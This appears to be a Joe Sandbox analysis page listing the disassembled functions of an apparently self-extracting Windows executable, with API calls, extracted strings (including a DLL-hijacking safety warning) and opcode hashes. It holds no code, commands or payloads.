Opcode ID: de8abfa7229b1edd29109abd571571e97c9e15b363706f80c43edb19f81fb34c
Instruction ID: dac51457e7d78f3d12dc1ad2b834a00f98a7b10a4e5089d722b640048f094df2
Opcode Fuzzy Hash: de8abfa7229b1edd29109abd571571e97c9e15b363706f80c43edb19f81fb34c
Instruction Fuzzy Hash: 91E2F022F0C68286EB1AFB65D5542FDA7A1FB46788F440035DA5E87B96EF3CE154C380

Function 00007FF64D3340BC Relevance: 10.7, APIs: 7, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE ref: 00007FF64D33410B
FindFirstFileW.KERNELBASE ref: 00007FF64D33415E
GetLastError.KERNEL32 ref: 00007FF64D3341AF
FindNextFileW.KERNEL32 ref: 00007FF64D3341D7
GetLastError.KERNEL32 ref: 00007FF64D3341E5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D33430F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D334315

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
String ID:
API String ID: 474548282-0
Opcode ID: ee5b8a3817742aa34bf8fe6f457784b4fe5053db0f5ec5b81f22969634733f46
Instruction ID: 329f8800ddcd86593a7afdc529553bdb95ae15bc08686d1ae01af9ca15e54d7b
Opcode Fuzzy Hash: ee5b8a3817742aa34bf8fe6f457784b4fe5053db0f5ec5b81f22969634733f46
Instruction Fuzzy Hash: F061A462E0CA4681EA11FB64E94427DA361FF967B4F505331EAAD83AD9EF3CD544C700

Function 00007FF64D325E24 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 586
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CMT, xrefs: 00007FF64D3259B2, 00007FF64D32675B

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID:
String ID: CMT
API String ID: 0-2756464174
Opcode ID: e58ea5d07e30f29eaf86f68642e1cb38961aa44a7661b56cd2ad864dc5164ece
Instruction ID: 58c7ea2d2455fed6b7aa6e985e0fe4d3f25b2001d552d2fd5d86ecbf81eb0e69
Opcode Fuzzy Hash: e58ea5d07e30f29eaf86f68642e1cb38961aa44a7661b56cd2ad864dc5164ece
Instruction Fuzzy Hash: 0042CE62F0C68296EB1AFB74D1502FDA7A1EF52748F400136DB5E93696EF38E558C380

Function 00007FF64D33DFD0 Relevance: 143.9, APIs: 16, Strings: 66, Instructions: 440
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(?,?,?,00000000,?), ref: 00007FF64D33E018
GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF64D33E030
GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF64D33E05D
CreateFileW.KERNEL32 ref: 00007FF64D33E3F0
SetFilePointer.KERNEL32 ref: 00007FF64D33E40E
ReadFile.KERNEL32 ref: 00007FF64D33E436

Part of subcall function 00007FF64D33DFD0: GetSystemDirectoryW.KERNEL32 ref: 00007FF64D33DDDF

CompareStringW.KERNELBASE ref: 00007FF64D33E559
CloseHandle.KERNEL32 ref: 00007FF64D33E4F3

Part of subcall function 00007FF64D321FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D321FFB

Part of subcall function 00007FF64D3351A4: GetVersionExW.KERNEL32 ref: 00007FF64D3351D5

Part of subcall function 00007FF64D33DFD0: LoadLibraryW.KERNELBASE ref: 00007FF64D33DEFF
Part of subcall function 00007FF64D33DFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D33DFB5
Part of subcall function 00007FF64D33DFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D33DFBB
Part of subcall function 00007FF64D33DFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D33DFC1
Part of subcall function 00007FF64D33DFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D33DFC7

AllocConsole.KERNEL32(?,?,?,00000000,?), ref: 00007FF64D33E74B
GetCurrentProcessId.KERNEL32(?,?,?,00000000,?), ref: 00007FF64D33E755
AttachConsole.KERNEL32(?,?,?,00000000,?), ref: 00007FF64D33E75D
GetStdHandle.KERNEL32(?,?,?,00000000,?), ref: 00007FF64D33E780
WriteConsoleW.KERNEL32(?,?,?,00000000,?), ref: 00007FF64D33E799
Sleep.KERNEL32(?,?,?,00000000,?), ref: 00007FF64D33E7A4
FreeConsole.KERNEL32(?,?,?,00000000,?), ref: 00007FF64D33E7AA
ExitProcess.KERNEL32 ref: 00007FF64D33E7BB

Strings

lpk.dll, xrefs: 00007FF64D33E0D3
atl.dll, xrefs: 00007FF64D33E136
SSPICLI.DLL, xrefs: 00007FF64D33E09C
cabinet.dll, xrefs: 00007FF64D33E1DB
devrtl.dll, xrefs: 00007FF64D33E29F
netapi32.dll, xrefs: 00007FF64D33E16B
wkscli.dll, xrefs: 00007FF64D33E2E5
rasadhlp.dll, xrefs: 00007FF64D33E30F
SetDllDirectoryW, xrefs: 00007FF64D33E026
netutils.dll, xrefs: 00007FF64D33E283
version.dll, xrefs: 00007FF64D33E07B
peerdist.dll, xrefs: 00007FF64D33E38D
clbcatq.dll, xrefs: 00007FF64D33E0E9
setupapi.dll, xrefs: 00007FF64D33E141
sfc_os.dll, xrefs: 00007FF64D33E091
cscapi.dll, xrefs: 00007FF64D33E22F
msasn1.dll, xrefs: 00007FF64D33E195
dfscli.dll, xrefs: 00007FF64D33E2F3
userenv.dll, xrefs: 00007FF64D33E15D
ntshrui.dll, xrefs: 00007FF64D33E12B
shdocvw.dll, xrefs: 00007FF64D33E179
samlib.dll, xrefs: 00007FF64D33E2D7
cryptui.dll, xrefs: 00007FF64D33E1A3
mpr.dll, xrefs: 00007FF64D33E291
apphelp.dll, xrefs: 00007FF64D33E14F
cryptsp.dll, xrefs: 00007FF64D33E355
ws2help.dll, xrefs: 00007FF64D33E10A
comres.dll, xrefs: 00007FF64D33E0F4
psapi.dll, xrefs: 00007FF64D33E115
XmlLite.dll, xrefs: 00007FF64D33E339
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00007FF64D33E73B
SetDefaultDllDirectories, xrefs: 00007FF64D33E053
shell32.dll, xrefs: 00007FF64D33E1BF
WindowsCodecs.dll, xrefs: 00007FF64D33E213
kernel32, xrefs: 00007FF64D33E011
aclui.dll, xrefs: 00007FF64D33E371
wintrust.dll, xrefs: 00007FF64D33E1B1
ieframe.dll, xrefs: 00007FF64D33E120
dhcpcsvc.dll, xrefs: 00007FF64D33E32B
profapi.dll, xrefs: 00007FF64D33E205
cryptbase.dll, xrefs: 00007FF64D33E0C8
ws2_32.dll, xrefs: 00007FF64D33E0FF
ntmarta.dll, xrefs: 00007FF64D33E1F7
srvcli.dll, xrefs: 00007FF64D33E221
UXTheme.dll, xrefs: 00007FF64D33E0B2
slc.dll, xrefs: 00007FF64D33E23D
crypt32.dll, xrefs: 00007FF64D33E187
samcli.dll, xrefs: 00007FF64D33E2C9
dsrole.dll, xrefs: 00007FF64D33E37F
secur32.dll, xrefs: 00007FF64D33E1CD
RpcRtRemote.dll, xrefs: 00007FF64D33E363
imageres.dll, xrefs: 00007FF64D33E24B
dnsapi.DLL, xrefs: 00007FF64D33E259
iphlpapi.DLL, xrefs: 00007FF64D33E267
uxtheme.dll, xrefs: 00007FF64D33E66D
propsys.dll, xrefs: 00007FF64D33E2AD
dwmapi.dll, xrefs: 00007FF64D33E0BD, 00007FF64D33E661
dhcpcsvc6.dll, xrefs: 00007FF64D33E31D
browcli.dll, xrefs: 00007FF64D33E301
WINNSI.DLL, xrefs: 00007FF64D33E275
rsaenh.dll, xrefs: 00007FF64D33E0A7
linkinfo.dll, xrefs: 00007FF64D33E347
mlang.dll, xrefs: 00007FF64D33E2BB
usp10.dll, xrefs: 00007FF64D33E0DE
DXGIDebug.dll, xrefs: 00007FF64D33E086, 00007FF64D33E5B6
oleaccrc.dll, xrefs: 00007FF64D33E1E9

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
API String ID: 1496594111-2013832382
Opcode ID: 652c747d7e630e86415ee3ad066f254a367a94a472fe2acd263d178260856de2
Instruction ID: 4821afe1ab80a312fed13026c1d4568a662123838a98d5a174ed7e3cd05014d9
Opcode Fuzzy Hash: 652c747d7e630e86415ee3ad066f254a367a94a472fe2acd263d178260856de2
Instruction Fuzzy Hash: 5532D831E0DB8295EB22BF60E8401E9B3A4FF4A358F501236DA4D96BA5FF38D655C350

Function 00007FF64D3398DC Relevance: 25.2, APIs: 3, Strings: 11, Instructions: 702COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF64D338E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF64D338F8D

_snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF64D339F75
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D33A42F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D33A435

Part of subcall function 00007FF64D340BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF64D340B44), ref: 00007FF64D340BE9

Strings

$%s:, xrefs: 00007FF64D339F50
*messages***, xrefs: 00007FF64D339C04
@%s:, xrefs: 00007FF64D339F57
RTL, xrefs: 00007FF64D339F2E
*messages***, xrefs: 00007FF64D339BC6
,, xrefs: 00007FF64D339FAA
STRINGS, xrefs: 00007FF64D339DC1
MENU, xrefs: 00007FF64D339DD9
DIALOG, xrefs: 00007FF64D339DCD
DIRECTION, xrefs: 00007FF64D339DE5
, xrefs: 00007FF64D339DF9

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
API String ID: 3629253777-3268106645
Opcode ID: bfd9826349ba550d8c78124b786cfa0a6bd1f1a0566aa61a924ec97ec8e1947b
Instruction ID: 8f696c708c74ad71b8eb4370bf85c38eca99089d9d96fe382e9c99981945b8aa
Opcode Fuzzy Hash: bfd9826349ba550d8c78124b786cfa0a6bd1f1a0566aa61a924ec97ec8e1947b
Instruction Fuzzy Hash: CD62AE22E1D68295EB22FB24D6542BDA365FB43788F805131DA5E87E95FF3CE544C340

Function 00007FF64D351900 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 195
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF64D351558: DloadProtectSection.DELAYIMP ref: 00007FF64D3515C9

RaiseException.KERNEL32 ref: 00007FF64D3519A7
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00007FF64D351993

Part of subcall function 00007FF64D351868: DloadProtectSection.DELAYIMP ref: 00007FF64D3518C7

LoadLibraryExA.KERNELBASE ref: 00007FF64D351A46
GetLastError.KERNEL32 ref: 00007FF64D351A54
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00007FF64D351A86
RaiseException.KERNEL32 ref: 00007FF64D351A9A

Strings

H, xrefs: 00007FF64D351974

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
String ID: H
API String ID: 3432403771-2852464175
Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
Instruction ID: 2a53351f6af9c7f5da72d45a282f79cd4c3642c654b275afddcf7140e438eaf0
Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
Instruction Fuzzy Hash: DA916922E08B528AEB52EF65D8942ACB3B1BB0AB98F044435DE0D57744FF78E845C340

Function 00007FF64D348624 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 101
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNELBASE ref: 00007FF64D34863D
SizeofResource.KERNEL32 ref: 00007FF64D348659
LoadResource.KERNEL32 ref: 00007FF64D348673
LockResource.KERNEL32 ref: 00007FF64D348685
GlobalAlloc.KERNELBASE ref: 00007FF64D3486A6
GlobalLock.KERNEL32 ref: 00007FF64D3486BB
GdipAlloc.GDIPLUS ref: 00007FF64D3486FE
GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF64D348769
GlobalUnlock.KERNEL32 ref: 00007FF64D34878C
GlobalFree.KERNEL32 ref: 00007FF64D348795

Strings

PNG, xrefs: 00007FF64D34862F

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
String ID: PNG
API String ID: 541704414-364855578
Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
Instruction ID: dd321bc0011118fb08b6ad3e0326daa0972f47e2d3ce6d6de5fe706bd931d323
Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
Instruction Fuzzy Hash: 66410725F1DA0282EA16BF56D864379A7A0AF8ABD4F084435DE0D873A4FE7DE449C700

Function 00007FF64D34F4E0 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 285
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32 ref: 00007FF64D34F747
ShowWindow.USER32 ref: 00007FF64D34F786
GetExitCodeProcess.KERNEL32 ref: 00007FF64D34F7BD
CloseHandle.KERNEL32 ref: 00007FF64D34F7E7
ShowWindow.USER32 ref: 00007FF64D34F83F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34F8FB

Strings

p, xrefs: 00007FF64D34F529
.inf, xrefs: 00007FF64D34F675
.exe, xrefs: 00007FF64D34F7F2
Install, xrefs: 00007FF64D34F684

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
String ID: .exe$.inf$Install$p
API String ID: 1054546013-3607691742
Opcode ID: 6e56b012281178d840e256ad45ed2bf74d7a60ef72c69255f0e18c76dd578e91
Instruction ID: 1f729023321e438578fa73509282745ae3cb12d7cdcc5a5c72a7728699a2dbcb
Opcode Fuzzy Hash: 6e56b012281178d840e256ad45ed2bf74d7a60ef72c69255f0e18c76dd578e91
Instruction Fuzzy Hash: 7FC19062F1CA0295FB12FB65D95027DA7B1AF86B84F084032EA4DC7AA5FF3DE4558300

Function 00007FF64D34F0A4 Relevance: 16.6, APIs: 11, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF64D34AE1C: PeekMessageW.USER32 ref: 00007FF64D34AE32
Part of subcall function 00007FF64D34AE1C: GetMessageW.USER32 ref: 00007FF64D34AE49
Part of subcall function 00007FF64D34AE1C: IsDialogMessageW.USER32 ref: 00007FF64D34AE60
Part of subcall function 00007FF64D34AE1C: TranslateMessage.USER32 ref: 00007FF64D34AE6F
Part of subcall function 00007FF64D34AE1C: DispatchMessageW.USER32 ref: 00007FF64D34AE7A

GetDlgItem.USER32 ref: 00007FF64D34F0E3
ShowWindow.USER32 ref: 00007FF64D34F109
IsDlgButtonChecked.USER32 ref: 00007FF64D34F11E
IsDlgButtonChecked.USER32 ref: 00007FF64D34F136
IsDlgButtonChecked.USER32 ref: 00007FF64D34F157
IsDlgButtonChecked.USER32 ref: 00007FF64D34F173
IsDlgButtonChecked.USER32 ref: 00007FF64D34F1B6
IsDlgButtonChecked.USER32 ref: 00007FF64D34F1D4
IsDlgButtonChecked.USER32 ref: 00007FF64D34F1E8
IsDlgButtonChecked.USER32 ref: 00007FF64D34F212
IsDlgButtonChecked.USER32 ref: 00007FF64D34F22A

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
String ID:
API String ID: 4119318379-0
Opcode ID: 6d17268858d6b6aed380ad60cc2cf8b16547cb3a0c40a3112c59011326a33119
Instruction ID: 2b1803ee70117f262a27cecf44c7d0894409708b1488f5ca7aa9a2cc21a6ecf6
Opcode Fuzzy Hash: 6d17268858d6b6aed380ad60cc2cf8b16547cb3a0c40a3112c59011326a33119
Instruction Fuzzy Hash: 8A41F535F1874286F711FF61E810BAA63A0EB8AB88F441135ED0E97B94DF7EE4498740

Function 00007FF64D32EF10 Relevance: 11.0, APIs: 7, Instructions: 453COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D32F542
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D32F548
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D32F554
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D32F55A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D32F560
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D32F56C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D32F572

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 62b60af2f7a88576df12e3db194ad19acd1e3759869934ce613b8f4ca490e85a
Instruction ID: aeddcb6522a81f8d25e34cc6ddabac77c5aefd0ad694d785650528215d789298
Opcode Fuzzy Hash: 62b60af2f7a88576df12e3db194ad19acd1e3759869934ce613b8f4ca490e85a
Instruction Fuzzy Hash: 3D12C062F0CB4185EB11FB65D4442EDA371AB467ACF500236EA5C97AD9EF3CE589C380

Function 00007FF64D3324C0 Relevance: 9.2, APIs: 6, Instructions: 164
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FF64D33259B
GetLastError.KERNEL32 ref: 00007FF64D3325AE
CreateFileW.KERNEL32 ref: 00007FF64D33260E
GetLastError.KERNEL32 ref: 00007FF64D332617
SetFileTime.KERNEL32 ref: 00007FF64D3326C9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D332736

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3536497005-0
Opcode ID: dc46ff84bd0c57c9ac2b9914d0228e8f14f7433d989622a2074281460ea8d587
Instruction ID: a6db4c30d29a509256a2ec11e6f1fa8fc39c115f65c29cff4a099c900d7bdd7b
Opcode Fuzzy Hash: dc46ff84bd0c57c9ac2b9914d0228e8f14f7433d989622a2074281460ea8d587
Instruction Fuzzy Hash: 5961D366E1C74186E721EB29E50036EA7B1BB8A7A8F101334DFAD43AD8EF7DD0548744

Function 00007FF64D34B014 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadBitmapW.USER32 ref: 00007FF64D34B02A
GetObjectW.GDI32 ref: 00007FF64D34B05B
DeleteObject.GDI32 ref: 00007FF64D34B095
DeleteObject.GDI32 ref: 00007FF64D34B0C5

Part of subcall function 00007FF64D348624: FindResourceW.KERNELBASE ref: 00007FF64D34863D
Part of subcall function 00007FF64D348624: SizeofResource.KERNEL32 ref: 00007FF64D348659
Part of subcall function 00007FF64D348624: LoadResource.KERNEL32 ref: 00007FF64D348673
Part of subcall function 00007FF64D348624: LockResource.KERNEL32 ref: 00007FF64D348685
